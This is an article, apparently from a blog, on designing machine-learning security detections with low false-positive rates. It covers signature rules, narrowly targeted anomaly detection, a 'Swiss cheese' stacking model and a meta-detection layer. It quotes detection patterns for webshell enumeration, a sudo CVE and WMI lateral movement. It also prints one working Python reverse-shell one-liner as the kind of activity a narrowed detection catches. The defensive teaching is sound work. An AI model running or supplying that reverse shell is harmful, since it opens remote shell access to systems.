Architecture of AI-Driven Security Operations with a Low False Positive Rate

This article discusses a mindset on building production-ready machine learning solutions when applied to cyber-security needs

Dmitrijs Trizna
Towards Data Science

--

Figure 1. Anomalies on NL2Bash data. Code. Security analysts want to avoid seeing this picture in their dashboards. Image by the author.

Even today, in a world where LLMs compromise the integrity of the educational system we used for decades, and we (finally) started to fear an existential dread from AGI, the applicability of artificial intelligence (AI) systems to non-conventional data science domains is far from achieving futuristic milestones and requires a distinct approach.

In this article, we have a conceptual discussion about AI applicability to cyber-security, why most applications fail, and what methodology actually works. Speculatively, the provided approach and conclusions are transferable to other application domains with low false-positive requirements, especially ones that rely on inference from system logs.

We will not cover how to implement machine learning (ML) logic on data relevant to information security. I have already provided functional implementations with code samples in the following articles:

Signatures

Even today, the fundamental and the most valuable component of mature security posture is just targeted signature rules. Heuristics, like those exemplified below, are an essential part of our defenses:

parent_process == "wmiprvse.exe"
&&
process == "cmd.exe"
&&
command_includes ("\\\\127.0.0.1\\ADMIN")

Honestly, rules like these are great. This is just an example, a (simplified) logic shared by the Red Canary for lateral movement detection via WMI that can be achieved with tools like impacket. Never turn such rules off, and keep stacking further!

But this approach leaves gaps...

That’s why once in a while, every Chief Information Security Officer (CISO) spends money, human, and time resources on a solution that offers to solve security problems through the magic of “machine learning”. Usually, this appears to be a rabbit hole with low return on investment: (1) dashboards of security analysts illuminate like a Christmas tree, consider Figure 1 above; (2) analysts got alert fatigue; (3) ML heuristics are disabled or just ignored.

General vs. Narrow Heuristics

Let me first bring to your attention the concept of narrow and general intelligence since this directly transfers to security heuristics.

Intelligence, in broad terms, is an ability to achieve goals. Humans are believed to have general intelligence since we are able to “generalize” and achieve goals that we would never require to reach in an environment driven by natural selection and genetic imperative, like landing on the moon.

While generalization allowed our species to conquer the world, there are entities that are much better than we are on a narrow set of tasks. For instance, calculators are way better at arithmetics than the cleverest of us like von Neumann ever could be, or squirrels (!) can significantly outperform humans on memorizing locations of acorns hidden last year.

Figure 2. Schematic view on intelligence. Image by the author.

We can reason about security heuristics in a similar way. There are rules that are heavily focused on a specific tool or CVE, and rules that attempt to detect a broader set of techniques. For instance, consider this detection logic focused solely on sudo privilege escalation abusing CVE-2019–14287:

CommandLine|contains: ' -u#'

On the contrary, this webshell detection rule (replicated in redacted form) attempts to implement a significantly broader logic:

ParentImage|endswith:
- '/httpd'
- '/nginx'
- '/apache2'
...

&&
Image|endswith:
- '/whoami'
- '/ifconfig'
- '/netstat'

It defines a more sophisticated behavioral heuristic that maps the parent process of common HTTP servers to the enumeration activity on the compromised host.

Resembling the intelligence landscape above, we can visualize a security posture by mapping detection rules to a landscape of offensive techniques, tools, and procedures (TTPs) as follows:

Figure 3. Schematic view of your security posture. Note the gaps, and don’t flatter yourself — you have more of them. Image by the author.

False-Positives vs. False-Negatives

Sudo CVE rule detects only one specific technique and misses all the others (extremely high False-Negative rate). On the contrary, the web shell rule might detect a set of offensive techniques and webshell tools from the Kali Linux arsenal.

The obvious question is — why, then, do we just not cover all possible TTPs with several broad behavioral rules?

Because they bring False-Positives… A lot.

Here we observe a False-Positive vs. False-Negative trade-off.

While most organizations can just copy-paste the sudo CVE rule and enable it right away in their SIEMs, the webshell rule might run for a while in “monitor only” mode while security analysts filter out all legitimate triggers observed in their environment.

By building detections, security engineers try to answer what is m̶a̶l̶i̶c̶i̶o̶u̶s̶̶ not representative to their environment.

They might see alerts from automation created by system administrators that run a REST API request which triggers one of the enumeration actions or an Ansible shell script that, when deployed, creates weird parent-child process relationships. Eventually, I observed how broad behavioral rules become lists with dozen exclusions and more edits per month than active code repositories. That’s why security engineers balance between broadness of their rules — expanding generalization is costly, and they try to keep the False-Positive rate as low as possible.

Failures of Machine Learning as a Security Heuristic

Here security professionals start to look for alternative techniques to implement behavioral heuristics. Requirements for ML implementations are a priori broad. Given the applicability of ML algorithms, most often, the intuition of security professionals leads them to unsupervised learning. We task AI to capture anomalies in the network, alert on anomalous command lines, et cetera. These tasks are at the generalization level of “solve security for me”. No surprise it works poorly in production.

Actually, oftentimes ML does exactly what we ask. It may report an anomalous elevator.exe binary, which IntelliJ uses to update itself for the first time, or a new CDN Spotify started using for updates with jittered delay exactly like Command and Control callback. And hundreds of similar behaviors, all of which were anomalous that day.

In the case of supervised learning, where it is possible to assemble large labeled datasets, for instance, malware detection, we indeed are capable of building qualitative modeling schemes like EMBER that are able to generalize well.

But even in solutions like these — modern AI models in infosec do not yet possess wide enough context to parse the “gray” area. For instance, do we consider TeamViewer bad or good? Many small and medium-sized businesses use it as a cheap VPN. At the same time, some of these small businesses are ransomware groups that backdoor target networks using such tools.

Successes of Machine Learning as a Security Heuristic

ML-based heuristics should follow the same ideology as rule-based detection — be focused on a specific set of malicious TTPs. To apply AI in security — you actually need to have some knowledge and intuition in security, sorry data scientists. ¯\_(ツ)_/¯ At least today, until LLMs achieve generalization so broad, they can solve security challenges (and many other tasks) collaterally.

For instance, instead of asking for anomalies in command lines (and getting results as in top Figure 1 of this article with 634 anomalies on humble size dataset), ask for out-of-baseline activity around a specific offensive technique — e.g., anomalous Python executions (T1059.006) and viola! — given the same ML algorithm, preprocessing, and modeling technique, we get only anomaly which is actually a Python reverse shell:

Figure 4. Python anomalies in the NL2Bash dataset expanded by malicious techniques. Anomaly reports Python reverse shell. Code. Image by the author.

Examples of unsupervised Unix-focused techniques that work:

  • Anomalous python/perl/ruby process (execution via scripting interpreter, T1059.006);
  • Anomalous systemd command (persistence via systemd process, T1543.002);
  • Anomalous ssh login source to high severity jumpbox (T1021.004).

Examples of unsupervised Windows-focused techniques that work:

  • Anomalous user logged on Domain Controllers, MSSQL servers (T1021.002);
  • An anomalous process that loads NTDLL.DLL (T1129);
  • Network connection with anomalous RDP client and server combination (T1021.001).

Examples of functional supervised ML baselines:

  • Reverse shell model: generate malicious part of a dataset from known methods (inspire yourself with generators like this); use the process creation events from your environment telemetry as a legitimate counterpart of a dataset.
  • Rather than building rules in mind with robustness against obfuscation, like one exemplified in Figure 5 below (spoiler: you won’t succeed), better build a separate ML model that detects obfuscation as a separate technique. Here is a good article on this topic by Mandiant.
Figure 5. Example of simple cmd.exe command line obfuscation. Image by the author.

Machine Learning is an Extension of Signature Logic

To systematize the examples above, successful application of the ML heuristic consists of these two steps:

  1. Narrow down input data so it captures telemetry generated by specific TTP as precise as possible;
  2. Define as few dimensions as possible along which to look for out-of-baseline activity (e.g., a logic that looks only at the process.image will bring up fewer alerts than logic that, in addition, looks on parent.process.image and process.args).

Step 1 above actually is how we create signature rules.

Do you remember how we discussed above that prior to enabling the web shell rule, “security analysts filter out all triggers representative for their environment”? This is Step 2.

In the previous case, a person builds a decision boundary between legitimate and malicious activity. This is actually where contemporary ML algorithms are good. ML heuristics can remove the burden of manually filtering out vast quantities of legitimate activity close to a specific TTP. Thus, ML allows building broader heuristics than signature rules with less work.

ML is just another way to achieve the same goal, an extension of signatures.

Swiss Cheese Model

Now we are ready to outline a holistic vision.

The traditional detection engineering approach is to stack as many signature rules as possible without overflowing SOC dashboards. Each of these rules has a high False Negative Rate (FNR) but a low False Positive Rate (FPR).

We can further continue stacking ML heuristics with the same requirement towards FPR – it has to be low to protect the only bottleneck: human analyst attention. ML heuristics allow covering gaps in rule-based detections by introducing more general behavioral logic without significantly depleting security engineer time resources.

If you have covered most of the low-hanging fruits and want to go deeper into behavioral analytics, you can bring deep learning logic on top of what you have.

Figure 6. A holistic view of collaborative work of security heuristics that use different techniques to achieve the same goal.

Remember the Occam razor principle, and implement every new heuristic as simply as possible. Do not use ML unless signature rules cannot define a reliable baseline.

Each of slices in this model should have low False Positive Rate. You can ignore high number of False Negatives — to combat that just add slices.

For instance, in the example above with anomalous Python executions — Python arguments might still be too variable in your environment, alerting you with too much anomalous activity. You might need to narrow it down further. For instance, capture only processes that have -c in the command line to look for cases where code is passed in as an argument to Python binary, therefore, only focusing on techniques like this Python reverse shell:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

Since we decrease FPR, we increase False-Negatives. Therefore, you might miss executions of Python from scripts with unusual names, like python fake_server.py, that an attacker might use to spoof a legitimate service. For that, you might want to create a separate heuristic that focuses on this subset of TTPs but has a low FPR on its own.

Meta-Detection Layer

Worth noting that even despite following the Swiss Cheese methodology, you will end up with verbose heuristics. Usually, those do not represent maliciousness a priori, however, are interested in the context.

For instance, SSH/RDP login to a high-severity host from a new source is not bad (just a new employee or workstation), as well as execution of whoami /all might be usual among skilled users. Thus both of these heuristics are not suitable for a direct trigger of an alert. However, a combination of the two might be worth analyst attention.

The solution to this dilemma comes with the introduction of additional logic on top of such verbose rules that yield “True Positive Benigns”. We can call it the meta-detection layer.

Figure 7. A schematic view of alerting setup that includes a dedicated parsing of verbose but useful rules.

The meta-logic that is applied on top of rule activations can vary but usually involves two steps:

  1. “Group by” all activations by an “entity”, e.g., host, username, source IP, cookie, etc.
  2. Apply an “aggregate function” on activations within some time period.

Examples of simple yet functional meta-detection logic:

  • just count the number of different rule triggers from a single entity, like a single host or user, and report if it exceeds a threshold, e.g., more than three different rules triggered within three hours;
  • the same as above, but apply weighted sum on rules based on severity, e.g., “critical” rule counts as 3, “medium” as 2, “info” as 1 — report if exceeds a threshold, like sum > 6;

More sophisticated methods exist, like one defined in the following AISec ’22 publication, where I use the second layer of ML on malware representations. These should be tuned to a specific application and environment since the data specifics, amount of telemetry, and infrastructure size might require a different approach to stay below the acceptable alert limit.

Conclusions

In this article, we discussed a mindset behind expanding your security operations arsenal beyond a signature approach. Most of the implementations fail to do it properly since security professionals define too broad requirements for behavioral heuristics through machine learning (ML).

We argue that proper application should be driven by offensive techniques, tactics, and procedures (TTPs). Given proper use, ML techniques save a vast amount of human resources, efficiently filtering out a baseline of legitimate activity around specific TTPs.

A mature and successful security posture will consist of signature and behavioral heuristics combined, where every separate detection logic has a low False-Positive rate, and limitations in missing False-Negatives are offset by stacking multiple heuristics in parallel.

Examples in this article included cases from detection engineering if applied to conventional security operations. However, we argue that the same methodology with limited modifications will be useful in other security applications, for instance, EDR/XDR heuristic space, network traffic analysis, and counting.

Appendix

Technical Note: Estimate Detection Rate under Fixed False Positive Rate

This is a notice with a code sample on how to evaluate behavioral ML heuristic utility in a production environment.

Data scientists — forget about the accuracy, F1-score, and AUC — these give little to no information on the production readiness of security solutions. These metrics can be used to reason about the relative utility of multiple solutions but not an absolute value.

This is because of the base rate fallacy in security telemetry — basically, all data your model will see are benign samples (until it is not, which really matters). Therefore, even a false-positive rate of 0.001% will bring you 10 alerts a day if your heuristic performs 10 000 checks daily.

The only true value of your model can be estimated by looking at the Detection Rate (aka, True Positive Rate, TPR) under a fixed False Positive Rate (FPR).

Consider the plot below — the x-axis represent a true label of a data sample. It is either malicious or benign. On the y-axis is the model’s probabilistic prediction — how bad it thinks the sample is:

Figure 7. Distribution on predictions on extended NL2Bash data. Code. Image by the author.

If you are allowed to bring only one false alert, you have to set a decision threshold of a model to be around ~0.75 (dashed red line), just above the second false positive. Therefore, the realistic detection rate of the model is ~50% (the dotted line almost overlaps with the mean value of boxplot).

Evaluation of detection rates under variable false positive rates, given you have y_true (true labels) and preds (model predictions), can be done with the code sample below:

--

--

Sr. Security Researcher @ Microsoft. This blog is an independent R&D at the intersection of Machine Learning and Cyber-Security.